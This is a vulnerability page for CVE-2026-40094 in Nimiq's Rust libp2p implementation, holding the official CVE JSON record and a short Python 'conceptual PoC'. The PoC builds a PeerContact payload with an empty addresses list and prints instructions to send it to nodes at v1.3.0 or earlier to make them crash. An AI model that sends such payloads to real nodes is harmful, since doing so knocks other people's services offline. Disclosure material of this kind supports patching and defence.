CVE-2026-40094

import json # Conceptual PoC for CVE-2026-40094 # This script demonstrates the structure of the malicious PeerContact payload. # In a real scenario, this would be sent via the libp2p protocol to a vulnerable node. def generate_malicious_peer_contact(): # Construct a PeerContact object with an empty addresses list malicious_payload = { "public_key": "<attacker_public_key>", "signature": "<attacker_signature>", "addresses": [], # The vulnerability trigger: Empty list "timestamp": 1716000000 } return json.dumps(malicious_payload) if __name__ == "__main__": print("[+] Generating malicious PeerContact payload...") payload = generate_malicious_peer_contact() print(f"[+] Payload: {payload}") print("[+] Send this payload to a vulnerable Nimiq node (v1.3.0 or earlier) via libp2p.") print("[+] Triggering get_address_book via RPC will cause the node to panic/crash.")

{"cve": {"id": "CVE-2026-40094", "sourceIdentifier": "[email protected]", "published": "2026-05-20T22:16:36.993", "lastModified": "2026-05-21T16:04:53.813", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "nimiq-blockchain provides persistent block storage for Nimiq's Rust implementation. In versions 1.3.0 and prior, network-libp2p discovery accepts signed PeerContact updates from untrusted peers and stores them in a peer contact book, eventually leading to address book crash. A PeerContact can legally contain an empty addresses list (no intrinsic validation enforces non-empty). Later, PeerContactBook::known_peers builds an address book by taking addresses.first().expect(\"every peer should have at least one address\"). If the attacker has inserted a signed peer contact with addresses=[], any call to get_address_book (RPC/web client) can panic and crash the node/RPC task depending on panic settings. This issue has been fixed in version 1.4.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-754"}]}], "references": [{"url": "https://github.com/nimiq/core-rs-albatross/pull/3715", "source": "[email protected]"}, {"url": "https://github.com/nimiq/core-rs-albatross/releases/tag/v1.4.0", "source": "[email protected]"}, {"url": "https://github.com/nimiq/core-rs-albatross/security/advisories/GHSA-c45m-6x25-3cjq", "source": "[email protected]"}]}}